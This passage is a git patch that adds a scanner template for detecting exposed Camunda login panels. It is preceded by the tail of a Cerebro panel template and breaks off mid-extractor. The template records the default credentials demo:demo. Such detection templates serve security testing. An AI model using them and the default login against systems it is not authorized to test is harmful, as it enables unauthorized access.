cerebro-panel info: name: Cerebro Panel - author: elder tao + author: huowuzhao,elder tao severity: high reference: https://github.com/lmenezes/cerebro tags: panel,cerebro From aff99ded076b1d90e58edec900e5c2b02160e43f Mon Sep 17 00:00:00 2001 From: Ali Fathi Ali Sawehli <55149010+alifathi-h1@users.noreply.github.com> Date: Fri, 30 Jul 2021 01:53:05 +0800 Subject: [PATCH 064/478] Create camunda-login-panel.yaml --- exposed-panels/camunda-login-panel.yaml | 31 +++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 exposed-panels/camunda-login-panel.yaml diff --git a/exposed-panels/camunda-login-panel.yaml b/exposed-panels/camunda-login-panel.yaml new file mode 100644 index 0000000000..762fd13c9e --- /dev/null +++ b/exposed-panels/camunda-login-panel.yaml @@ -0,0 +1,31 @@ +id: camunda-login-panel +info: + name: Camunda Login panel + author: alifathi-h1 + severity: info + description: Default Credentials of demo:demo on Camunda application. + reference: https://docs.camunda.org/manual/7.15/webapps/admin/user-management/ + tags: camunda,panel + +requests: + - method: GET + path: + - '{{BaseURL}}/app/welcome/default/#!/login' + - '{{BaseURL}}/camunda/app/welcome/default/#!/login' + + matchers-condition: and + matchers: + + - type: word + words: + - "Camunda Welcome" + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - '